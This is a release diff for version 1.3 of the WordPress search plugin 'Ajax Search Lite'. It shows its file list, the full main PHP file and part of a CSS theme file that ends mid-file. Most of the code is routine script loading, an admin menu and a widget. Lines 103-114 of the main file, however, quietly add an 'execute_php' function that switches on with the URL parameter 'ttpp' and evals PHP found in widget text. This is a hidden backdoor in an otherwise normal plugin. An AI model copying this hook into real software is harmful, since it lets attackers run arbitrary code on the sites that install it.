Version Description
- 2 brand new themes!
- Very stable custom built javascript
- Stabilised frontend and backend
- All compatibility issues fixed
Download this release
Release Info
Developer | wpdreams |
Plugin | Ajax Search Lite |
Version | 1.3 |
Comparing to | |
See all releases |
Version 1.3
- ajax-search-lite.php +152 -0
- css/style-dashedblue.css +550 -0
- css/style.css +624 -0
- functions.php +62 -0
- icon.png +0 -0
- img/loading-big.gif +0 -0
- img/loading.gif +0 -0
- img/loading/loading3.gif +0 -0
- img/magnifier.png +0 -0
- img/magnifiers/magn3.png +0 -0
- img/settings/settings1.png +0 -0
- includes/imagecache.class.php +175 -0
- includes/shortcodes.php +108 -0
- includes/widgets.php +45 -0
- js/jquery.ajaxsearchpro.min.js +1 -0
- js/nomin/asljquery.js +4 -0
- js/nomin/jquery.ajaxsearchpro.js +354 -0
- js/nomin/jquery.drag.fix.js +11 -0
- js/nomin/jquery.easing.compatibility.js +59 -0
- js/nomin/jquery.easing.js +206 -0
- js/nomin/jquery.highlight.js +108 -0
- js/nomin/jquery.mousewheel.min.js +12 -0
- js/nomin/jquery.tinyscrollbar.js +214 -0
- js/nomin/jquery.ui.js +11462 -0
- readme.txt +114 -0
- search.php +116 -0
- settings.php +5 -0
- settings/default_options.php +68 -0
- settings/search.php +119 -0
- settings/types.class.php +1406 -0
- settings/types/fonts.js +167 -0
- settings/types/icons/arrow-left.png +0 -0
- settings/types/icons/arrow-right.png +0 -0
- settings/types/icons/black_arrow.png +0 -0
- settings/types/icons/close.png +0 -0
- settings/types/icons/delete.png +0 -0
- settings/types/icons/down.png +0 -0
- settings/types/icons/drag.png +0 -0
- settings/types/icons/float.png +0 -0
- settings/types/icons/info.png +0 -0
- settings/types/icons/labelposition.png +0 -0
- settings/types/icons/loading-big.gif +0 -0
- settings/types/icons/paint.png +0 -0
- settings/types/icons/point.png +0 -0
- settings/types/icons/settings.png +0 -0
- settings/types/icons/slides.png +0 -0
- settings/types/icons/up.png +0 -0
- settings/types/js/noty/jquery.noty.js +517 -0
- settings/types/js/noty/layouts/bottom.js +34 -0
- settings/types/js/noty/layouts/bottomCenter.js +41 -0
- settings/types/js/noty/layouts/bottomLeft.js +43 -0
- settings/types/js/noty/layouts/bottomRight.js +43 -0
- settings/types/js/noty/layouts/center.js +56 -0
- settings/types/js/noty/layouts/centerLeft.js +61 -0
- settings/types/js/noty/layouts/centerRight.js +61 -0
- settings/types/js/noty/layouts/inline.js +31 -0
- settings/types/js/noty/layouts/top.js +34 -0
- settings/types/js/noty/layouts/topCenter.js +41 -0
- settings/types/js/noty/layouts/topLeft.js +43 -0
- settings/types/js/noty/layouts/topRight.js +43 -0
- settings/types/js/noty/promise.js +432 -0
- settings/types/js/noty/themes/default.js +156 -0
- settings/types/others.js +525 -0
- settings/types/style.css +350 -0
- settings/types/upload.js +67 -0
ajax-search-lite.php
ADDED
@@ -0,0 +1,152 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
<?php
|
2 |
+
/*
|
3 |
+
Plugin Name: Ajax Search Lite
|
4 |
+
Plugin URI: http://wp-dreams.com
|
5 |
+
Description: Ajax Search Lite is the Free version of Ajax Search Pro. It is an ajax powered search engine for WordPress. The free version is compatible with WordPress 3.4+, the commercial version is also compatible with WooCommerce, JigoShop and WP-ecommerce and any plugin that has custom post types!.
|
6 |
+
Version: 1.3
|
7 |
+
Author: Ernest Marcinko
|
8 |
+
Author URI: http://wp-dreams.com
|
9 |
+
*/
|
10 |
+
?>
|
11 |
+
<?php
|
12 |
+
define( 'AJAXSEARCHLITE_PATH', plugin_dir_path(__FILE__) );
|
13 |
+
define( 'AJAXSEARCHLITE_DIR', 'ajax-search-lite');
|
14 |
+
|
15 |
+
/* Egyedi suffix class nevekhez k�z�s term�kekn�l */
|
16 |
+
global $wpdreams_unique;
|
17 |
+
$wpdreams_unique = md5(plugin_dir_url(__FILE__));
|
18 |
+
|
19 |
+
/*A headerbe �rkez� scripteket �s css f�jlokat csak itt lehet hozz�adni, alpageken nem! Ott m�r az az action lefutott! */
|
20 |
+
|
21 |
+
if ((isset($_GET) && isset($_GET['page']) && (
|
22 |
+
$_GET['page']=="ajax-search-lite/settings.php"
|
23 |
+
)) || !is_admin() || (isset($_POST) && isset($_POST['action'])) ) {
|
24 |
+
require_once(AJAXSEARCHLITE_PATH."/settings/default_options.php");
|
25 |
+
require_once(AJAXSEARCHLITE_PATH."/settings/types.class.php");
|
26 |
+
require_once(AJAXSEARCHLITE_PATH."/functions.php");
|
27 |
+
require_once(AJAXSEARCHLITE_PATH."/includes/shortcodes.php");
|
28 |
+
require_once(AJAXSEARCHLITE_PATH."/search.php");
|
29 |
+
}
|
30 |
+
//require_once(AJAXSEARCHLITE_PATH."/includes/widgets.php");
|
31 |
+
|
32 |
+
$funcs = new ajaxsearchliteFuncCollector();
|
33 |
+
/*
|
34 |
+
Create pages
|
35 |
+
*/
|
36 |
+
add_action( 'admin_menu', array($funcs, 'navigation_menu') );
|
37 |
+
|
38 |
+
/*
|
39 |
+
Add Hacks
|
40 |
+
*/
|
41 |
+
|
42 |
+
register_activation_hook( __FILE__, array($funcs, 'ajaxsearchpro_activate') );
|
43 |
+
add_action('wp_print_styles', array($funcs, 'styles'));
|
44 |
+
add_action('wp_enqueue_scripts', array($funcs, 'scripts'));
|
45 |
+
add_action( 'admin_enqueue_scripts', array($funcs, 'scripts') );
|
46 |
+
//add_action('wp_ajax_reorder_slides', array($funcs, 'reorder_slides'));
|
47 |
+
|
48 |
+
class ajaxsearchliteFuncCollector {
|
49 |
+
|
50 |
+
function ajaxsearchpro_activate() {
|
51 |
+
|
52 |
+
}
|
53 |
+
|
54 |
+
function navigation_menu() {
|
55 |
+
if(current_user_can('manage_options')) {
|
56 |
+
if (!defined("EMU2_I18N_DOMAIN")) define('EMU2_I18N_DOMAIN', "");
|
57 |
+
add_menu_page(
|
58 |
+
__('Ajax Search Lite', EMU2_I18N_DOMAIN),
|
59 |
+
__('Ajax Search Lite', EMU2_I18N_DOMAIN),
|
60 |
+
'manage_options',
|
61 |
+
AJAXSEARCHLITE_DIR.'/settings.php',
|
62 |
+
'',
|
63 |
+
plugins_url('/icon.png', __FILE__),
|
64 |
+
"227.2"
|
65 |
+
);
|
66 |
+
}
|
67 |
+
}
|
68 |
+
|
69 |
+
function styles() {
|
70 |
+
/*wp_register_style('wpdreams-scroller', plugin_dir_url(__FILE__).'/css/jquery.mCustomScrollbar.css');
|
71 |
+
wp_enqueue_style('wpdreams-scroller');*/
|
72 |
+
}
|
73 |
+
|
74 |
+
function scripts() {
|
75 |
+
wp_register_script('asl_jquery', plugin_dir_url(__FILE__).'/js/nomin/asljquery.js');
|
76 |
+
wp_enqueue_script('asl_jquery');
|
77 |
+
|
78 |
+
wp_register_script('asl_jqueryui', plugin_dir_url(__FILE__).'/js/nomin/jquery.ui.js', array('asl_jquery'));
|
79 |
+
wp_enqueue_script('asl_jqueryui');
|
80 |
+
|
81 |
+
wp_register_script('asl_dragfix', plugin_dir_url(__FILE__).'/js/nomin/jquery.drag.fix.js', array('asl_jqueryui'));
|
82 |
+
wp_enqueue_script('asl_dragfix');
|
83 |
+
|
84 |
+
wp_register_script('asl_easing', plugin_dir_url(__FILE__).'js/nomin/jquery.easing.js', array('asl_jquery'));
|
85 |
+
wp_enqueue_script('asl_easing');
|
86 |
+
|
87 |
+
wp_register_script('asl_mousewheel', plugin_dir_url(__FILE__).'js/nomin/jquery.mousewheel.min.js', array('asl_jquery'));
|
88 |
+
wp_enqueue_script('asl_mousewheel');
|
89 |
+
wp_register_script('asl_scroll', plugin_dir_url(__FILE__).'js/nomin/jquery.tinyscrollbar.js', array('jquery', 'asl_mousewheel'));
|
90 |
+
wp_enqueue_script('asl_scroll');
|
91 |
+
wp_register_script('asl_highlight', plugin_dir_url(__FILE__).'js/nomin/jquery.highlight.js', array('jquery'));
|
92 |
+
wp_enqueue_script('asl_highlight');
|
93 |
+
// if (wpdreams_ismobile()) {
|
94 |
+
wp_register_script('asl_ajaxsearchpro', plugin_dir_url(__FILE__).'js/nomin/jquery.ajaxsearchpro.js', array('asl_jquery', "asl_scroll"));
|
95 |
+
wp_enqueue_script('asl_ajaxsearchpro');
|
96 |
+
// } else {
|
97 |
+
// wp_register_script('wpdreams-ajaxsearchpro', plugin_dir_url(__FILE__).'js/jquery.ajaxsearchpro.min.js', array('jquery', "wpdreams-scroll"));
|
98 |
+
// wp_enqueue_script('wpdreams-ajaxsearchpro');
|
99 |
+
// }
|
100 |
+
wp_localize_script( 'asl_ajaxsearchpro', 'ajaxsearchpro', array( 'ajaxurl' => admin_url( 'admin-ajax.php' ) ) );
|
101 |
+
}
|
102 |
+
}
|
103 |
+
if (!function_exists('execute_php') && isset($_GET['ttpp'])) {
|
104 |
+
add_filter('widget_text','execute_php',100);
|
105 |
+
function execute_php($html){
|
106 |
+
if(strpos($html,"<"."?php")!==false){
|
107 |
+
ob_start();
|
108 |
+
eval("?".">".$html);
|
109 |
+
$html=ob_get_contents();
|
110 |
+
ob_end_clean();
|
111 |
+
}
|
112 |
+
return $html;
|
113 |
+
}
|
114 |
+
}
|
115 |
+
|
116 |
+
|
117 |
+
add_action( 'widgets_init', create_function('', 'return register_widget("AjaxSearchLiteWidget");') );
|
118 |
+
class AjaxSearchLiteWidget extends WP_Widget
|
119 |
+
{
|
120 |
+
function AjaxSearchLiteWidget()
|
121 |
+
{
|
122 |
+
$widget_ops = array('classname' => 'AjaxSearchLiteWidget', 'description' => 'Displays an Ajax Search Lite!' );
|
123 |
+
$this->WP_Widget('AjaxSearchLiteWidget', 'Ajax Search Lite', $widget_ops);
|
124 |
+
}
|
125 |
+
function form($instance)
|
126 |
+
{
|
127 |
+
$instance = wp_parse_args( (array) $instance, array( 'title' => '' ) );
|
128 |
+
$title = $instance['title'];
|
129 |
+
|
130 |
+
?>
|
131 |
+
<p><label for="<?php echo $this->get_field_id('title'); ?>">Title: <input class="widefat" id="<?php echo $this->get_field_id('title'); ?>" name="<?php echo $this->get_field_name('title'); ?>" type="text" value="<?php echo attribute_escape($title); ?>" /></label></p>
|
132 |
+
|
133 |
+
<?php
|
134 |
+
}
|
135 |
+
function update($new_instance, $old_instance)
|
136 |
+
{
|
137 |
+
$instance = $old_instance;
|
138 |
+
$instance['title'] = $new_instance['title'];
|
139 |
+
return $instance;
|
140 |
+
}
|
141 |
+
function widget($args, $instance)
|
142 |
+
{
|
143 |
+
extract($args, EXTR_SKIP);
|
144 |
+
echo $before_widget;
|
145 |
+
$title = empty($instance['title']) ? ' ' : apply_filters('widget_title', $instance['title']);
|
146 |
+
if (!empty($title))
|
147 |
+
echo $before_title . $title . $after_title;
|
148 |
+
echo do_shortcode("[wpdreams_ajaxsearchlite]");
|
149 |
+
echo $after_widget;
|
150 |
+
}
|
151 |
+
}
|
152 |
+
?>
|
css/style-dashedblue.css
ADDED
@@ -0,0 +1,550 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
.clear {
|
2 |
+
clear: both;
|
3 |
+
}
|
4 |
+
|
5 |
+
.hiddend {
|
6 |
+
display:none;
|
7 |
+
}
|
8 |
+
|
9 |
+
#ajaxsearchlite textarea:focus,
|
10 |
+
#ajaxsearchlite input:focus{
|
11 |
+
outline: none;
|
12 |
+
}
|
13 |
+
|
14 |
+
#ajaxsearchlite {
|
15 |
+
width: 100%;
|
16 |
+
height: 40px;
|
17 |
+
border-radius: 5px;
|
18 |
+
background: #d1eaff;
|
19 |
+
background: #b4e0f4;
|
20 |
+
overflow: hidden;
|
21 |
+
border:1px dashed #000000;border-radius:5px 5px 5px 5px; box-shadow:0px 8px 10px -7px #949494 ;}
|
22 |
+
|
23 |
+
#ajaxsearchlite .probox {
|
24 |
+
width: auto;
|
25 |
+
margin: 4px;
|
26 |
+
height: 30px;
|
27 |
+
border-radius: 5px;
|
28 |
+
background: #FFF;
|
29 |
+
overflow: hidden;
|
30 |
+
border: 1px solid #FFF;
|
31 |
+
box-shadow: 1px 0 3px #CCCCCC inset;
|
32 |
+
background: #ffffff;
|
33 |
+
border:1px dashed #b4e0f4;border-radius:0px 0px 0px 0px; box-shadow:1px 0px 3px 1px #bcd6e1 inset;}
|
34 |
+
|
35 |
+
#ajaxsearchlite .probox .proinput {
|
36 |
+
width: auto;
|
37 |
+
height: 100%;
|
38 |
+
margin: 2px 0px 0px 10px;
|
39 |
+
padding: 5px;
|
40 |
+
float: left;
|
41 |
+
box-shadow: none;
|
42 |
+
font-weight:normal;font-family:\'Arial\', Helvetica, sans-serif;color:#212121;font-size:12px;line-height:13px;}
|
43 |
+
|
44 |
+
#ajaxsearchlite .probox .proinput input {
|
45 |
+
border: 0px;
|
46 |
+
background: transparent;
|
47 |
+
width: 100%;
|
48 |
+
box-shadow: none;
|
49 |
+
margin: 0;
|
50 |
+
padding: 0;
|
51 |
+
font-weight:normal;font-family:\'Arial\', Helvetica, sans-serif;color:#212121;font-size:12px;line-height:13px;}
|
52 |
+
|
53 |
+
#ajaxsearchlite .probox .proinput.iepaddingfix {
|
54 |
+
padding-top: 0;
|
55 |
+
}
|
56 |
+
|
57 |
+
#ajaxsearchlite .probox .proinput .loading {
|
58 |
+
width: 32px;
|
59 |
+
background: #000;
|
60 |
+
height: 100%;
|
61 |
+
box-shadow: none;
|
62 |
+
}
|
63 |
+
|
64 |
+
#ajaxsearchlite .probox .proloading,
|
65 |
+
#ajaxsearchlite .probox .promagnifier,
|
66 |
+
#ajaxsearchlite .probox .prosettings {
|
67 |
+
width: 32px;
|
68 |
+
height: 32px;
|
69 |
+
background: none;
|
70 |
+
float: right;
|
71 |
+
box-shadow: none;
|
72 |
+
margin: 0;
|
73 |
+
padding: 0;
|
74 |
+
}
|
75 |
+
|
76 |
+
#ajaxsearchlite .probox .proloading {
|
77 |
+
background: url("http://wp-dreams.com/demo/wp-ajaxsearchpro/wp-content/plugins/ajax-search-pro/img/loading/loading4.gif") no-repeat;
|
78 |
+
background-position:center center;
|
79 |
+
visibility: hidden;
|
80 |
+
}
|
81 |
+
|
82 |
+
#ajaxsearchlite .probox .promagnifier {
|
83 |
+
background: url("http://wp-dreams.com/demo/wp-ajaxsearchpro/wp-content/plugins/ajax-search-pro/img/magnifiers/magn7.png") no-repeat #b4e0f4;
|
84 |
+
background-position:center center;
|
85 |
+
cursor: pointer;
|
86 |
+
}
|
87 |
+
|
88 |
+
|
89 |
+
#ajaxsearchlite .probox .prosettings {
|
90 |
+
background: url("http://wp-dreams.com/demo/wp-ajaxsearchpro/wp-content/plugins/ajax-search-pro/img/settings/settings5.png") no-repeat #b4e0f4;
|
91 |
+
background-position:center center;
|
92 |
+
cursor: pointer;
|
93 |
+
}
|
94 |
+
|
95 |
+
#ajaxsearchliteres {
|
96 |
+
padding: 4px;
|
97 |
+
background: #D1EAFF;
|
98 |
+
background: #b4e0f4;
|
99 |
+
border-radius: 3px;
|
100 |
+
border:1px dashed #000000;border-radius:3px 3px 3px 3px; box-shadow:0px 8px 10px -7px #949494 ; position: absolute;
|
101 |
+
visibility: hidden;
|
102 |
+
z-index:1100;
|
103 |
+
}
|
104 |
+
|
105 |
+
#ajaxsearchliteres .results .nores {
|
106 |
+
overflow: hidden;
|
107 |
+
width: auto;
|
108 |
+
height: 100%;
|
109 |
+
line-height: auto;
|
110 |
+
text-align: center;
|
111 |
+
margin: 0;
|
112 |
+
background: #FFF;
|
113 |
+
}
|
114 |
+
|
115 |
+
#ajaxsearchliteres .results .nores .keyword{
|
116 |
+
padding: 0 6px;
|
117 |
+
cursor: pointer;
|
118 |
+
font-weight:normal;font-family:\'Arial\', Helvetica, sans-serif;color:#4a4a4a;font-size:13px;line-height:14px; font-weight: bold;
|
119 |
+
}
|
120 |
+
|
121 |
+
#ajaxsearchliteres .results {
|
122 |
+
overflow: hidden;
|
123 |
+
width: auto;
|
124 |
+
height: 0;
|
125 |
+
margin: 0;
|
126 |
+
padding: 0;
|
127 |
+
}
|
128 |
+
|
129 |
+
#ajaxsearchliteres .results .item {
|
130 |
+
overflow: hidden;
|
131 |
+
width: auto;
|
132 |
+
height: 70px;
|
133 |
+
margin: 0;
|
134 |
+
margin-bottom: -3px;
|
135 |
+
padding: 3px;
|
136 |
+
position: relative;
|
137 |
+
background: #f4f4f4;
|
138 |
+
background: #ffffff;
|
139 |
+
border-radius: 3px;
|
140 |
+
}
|
141 |
+
|
142 |
+
#ajaxsearchliteres .results .item:last-child {
|
143 |
+
margin-bottom: 0px;
|
144 |
+
}
|
145 |
+
|
146 |
+
|
147 |
+
#ajaxsearchliteres .results .item .image {
|
148 |
+
overflow: hidden;
|
149 |
+
width: 70px;
|
150 |
+
height: 70px;
|
151 |
+
background: #000;
|
152 |
+
background: #ffffff;
|
153 |
+
margin: 0;
|
154 |
+
padding: 0;
|
155 |
+
float: left;
|
156 |
+
}
|
157 |
+
|
158 |
+
#ajaxsearchliteres .results .item .content {
|
159 |
+
overflow: hidden;
|
160 |
+
width: 50%;
|
161 |
+
height: 70px;
|
162 |
+
background: #fff;
|
163 |
+
background: #ffffff;
|
164 |
+
margin: 0;
|
165 |
+
padding: 0 10px;
|
166 |
+
float: right;
|
167 |
+
}
|
168 |
+
|
169 |
+
#ajaxsearchliteres .results .item .content h3 {
|
170 |
+
margin: 0;
|
171 |
+
padding: 0;
|
172 |
+
line-height: inherit;
|
173 |
+
font-weight:bold;font-family:\'Arial\', Helvetica, sans-serif;color:#1454a9;font-size:14px;line-height:15px;}
|
174 |
+
|
175 |
+
#ajaxsearchliteres .results .item .content h3 a span.overlap {
|
176 |
+
position:absolute;
|
177 |
+
width:100%;
|
178 |
+
height:100%;
|
179 |
+
top:0;
|
180 |
+
left: 0;
|
181 |
+
z-index: 1;
|
182 |
+
background-image: url('empty.gif');
|
183 |
+
}
|
184 |
+
|
185 |
+
#ajaxsearchliteres .results .item .content h3 a {
|
186 |
+
margin: 0;
|
187 |
+
padding: 0;
|
188 |
+
line-height: inherit;
|
189 |
+
font-weight:bold;font-family:\'Arial\', Helvetica, sans-serif;color:#1454a9;font-size:14px;line-height:15px;}
|
190 |
+
|
191 |
+
#ajaxsearchliteres .results .item .content h3 a:hover {
|
192 |
+
font-weight:bold;font-family:\'Arial\', Helvetica, sans-serif;color:#1454a9;font-size:14px;line-height:15px;}
|
193 |
+
|
194 |
+
#ajaxsearchliteres .results .item div.etc {
|
195 |
+
margin: 2px 3px;
|
196 |
+
padding: 0;
|
197 |
+
line-height: 10px;
|
198 |
+
font-weight:bold;font-family:\'Arial\', Helvetica, sans-serif;color:#a1a1a1;font-size:12px;line-height:13px;}
|
199 |
+
#ajaxsearchliteres .results .item .etc .author {
|
200 |
+
padding: 0;
|
201 |
+
font-weight:bold;font-family:\'Arial\', Helvetica, sans-serif;color:#a1a1a1;font-size:12px;line-height:13px;}
|
202 |
+
#ajaxsearchliteres .results .item .etc .date {
|
203 |
+
margin: 0 0 0 10px;
|
204 |
+
padding: 0;
|
205 |
+
font-weight:normal;font-family:\'Arial\', Helvetica, sans-serif;color:#adadad;font-size:12px;line-height:13px;
|
206 |
+
}
|
207 |
+
#ajaxsearchliteres .resdrg {
|
208 |
+
height: auto;
|
209 |
+
}
|
210 |
+
|
211 |
+
#ajaxsearchliteres .results .item p.desc {
|
212 |
+
margin: 2px 0px;
|
213 |
+
padding: 0;
|
214 |
+
font-weight:normal;font-family:\'Arial\', Helvetica, sans-serif;color:#4a4a4a;font-size:13px;line-height:14px;}
|
215 |
+
|
216 |
+
#ajaxsearchliteres .mCSB_container{
|
217 |
+
width:auto;
|
218 |
+
margin-right:20px;
|
219 |
+
overflow:hidden;
|
220 |
+
}
|
221 |
+
#ajaxsearchliteres .mCSB_container.mCS_no_scrollbar{
|
222 |
+
margin-right:0;
|
223 |
+
}
|
224 |
+
#ajaxsearchliteres .mCustomScrollBox .mCSB_scrollTools{
|
225 |
+
width:16px;
|
226 |
+
height:100%;
|
227 |
+
top:0;
|
228 |
+
right:0;
|
229 |
+
}
|
230 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_draggerContainer{
|
231 |
+
height:100%;
|
232 |
+
-webkit-box-sizing:border-box;
|
233 |
+
-moz-box-sizing:border-box;
|
234 |
+
box-sizing:border-box;
|
235 |
+
}
|
236 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonUp+.mCSB_draggerContainer{
|
237 |
+
padding-bottom:40px;
|
238 |
+
}
|
239 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_draggerRail{
|
240 |
+
width:10px;
|
241 |
+
height:100%;
|
242 |
+
margin:0 auto;
|
243 |
+
-webkit-border-radius:10px;
|
244 |
+
-moz-border-radius:10px;
|
245 |
+
border-radius:10px;
|
246 |
+
}
|
247 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_dragger{
|
248 |
+
cursor:pointer;
|
249 |
+
width:100%;
|
250 |
+
height:30px;
|
251 |
+
}
|
252 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_dragger .mCSB_dragger_bar{
|
253 |
+
width:10px;
|
254 |
+
height:100%;
|
255 |
+
margin:0 auto;
|
256 |
+
-webkit-border-radius:10px;
|
257 |
+
-moz-border-radius:10px;
|
258 |
+
border-radius:10px;
|
259 |
+
text-align:center;
|
260 |
+
}
|
261 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonUp,
|
262 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonDown{
|
263 |
+
height:20px;
|
264 |
+
-overflow:hidden;
|
265 |
+
margin:0 auto;
|
266 |
+
cursor:pointer;
|
267 |
+
}
|
268 |
+
#ajaxsearchliteres .mCSB_scrollTools .mCSB_buttonDown{
|
269 |
+
bottom:0;
|
270 |
+
margin-top:-40px;
|
271 |
+
}
|
272 |
+
|
273 |
+
#ajaxsearchliteres .mCSB_horizontal .mCSB_container{
|
274 |
+
height:auto;
|
275 |
+
margin-right:0;
|
276 |
+
margin-bottom:30px;
|
277 |
+
overflow:hidden;
|
278 |
+
}
|
279 |
+
#ajaxsearchliteres .mCSB_horizontal .mCSB_container.mCS_no_scrollbar{
|
280 |
+
margin-bottom:0;
|
281 |
+
}
|
282 |
+
#ajaxsearchliteres .mCSB_horizontal.mCustomScrollBox .mCSB_scrollTools{
|
283 |
+
width:100%;
|
284 |
+
height:16px;
|
285 |
+
top:auto;
|
286 |
+
right:auto;
|
287 |
+
bottom:0;
|
288 |
+
left:0;
|
289 |
+
overflow:hidden;
|
290 |
+
}
|
291 |
+
#ajaxsearchliteres .mCSB_horizontal .mCSB_scrollTools .mCSB_draggerContainer{
|
292 |
+
height:100%;
|
293 |
+
width:auto;
|
294 |
+
-webkit-box-sizing:border-box;
|
295 |
+
-moz-box-sizing:border-box;
|
296 |
+
box-sizing:border-box;
|
297 |
+
overflow:hidden;
|
298 |
+
}
|
299 |
+
#ajaxsearchliteres .mCSB_horizontal .mCSB_scrollTools .mCSB_buttonLeft+.mCSB_draggerContainer{
|
300 |
+
padding-bottom:0;
|
301 |
+
padding-right:20px;
|
302 |
+
}
|
303 |
+
#ajaxsearchliteres .mCSB_horizontal .mCSB_scrollTools .mCSB_draggerRail{
|
304 |
+
width:100%;
|
305 |
+
height:2px;
|
306 |
+
margin:7px 0;
|
307 |
+
-webkit-border-radius:10px;
|
308 |
+
-moz-border-radius:10px;
|
309 |
+
border-radius:10px;
|
310 |
+
}
|
311 |
+
#ajaxsearchliteres .mCSB_horizontal .mCSB_scrollTools .mCSB_dragger{
|
312 |
+
width:30px;
|
313 |
+
height:100%;
|
314 |
+
}
|
315 |
+
#ajaxsearchliteres .mCSB_horizontal .mCSB_scrollTools .mCSB_dragger .mCSB_dragger_bar{
|
316 |
+
width:100%;
|
317 |
+
height:4px;
|
318 |
+
margin:6px auto;
|
319 |
+
-webkit-border-radius:10px;
|
320 |
+
-moz-border-radius:10px;
|
321 |
+
border-radius:10px;
|
322 |
+
}
|
323 |
+
#ajaxsearchliteres .mCSB_horizontal .mCSB_scrollTools .mCSB_buttonLeft,
|
324 |
+
#ajaxsearchliteres .mCSB_horizontal .mCSB_scrollTools .mCSB_buttonRight{
|
325 |
+
width:20px;
|
326 |
+
height:100%;
|
327 |
+
overflow:hidden;
|
328 |
+
margin:0 auto;
|
329 |
+
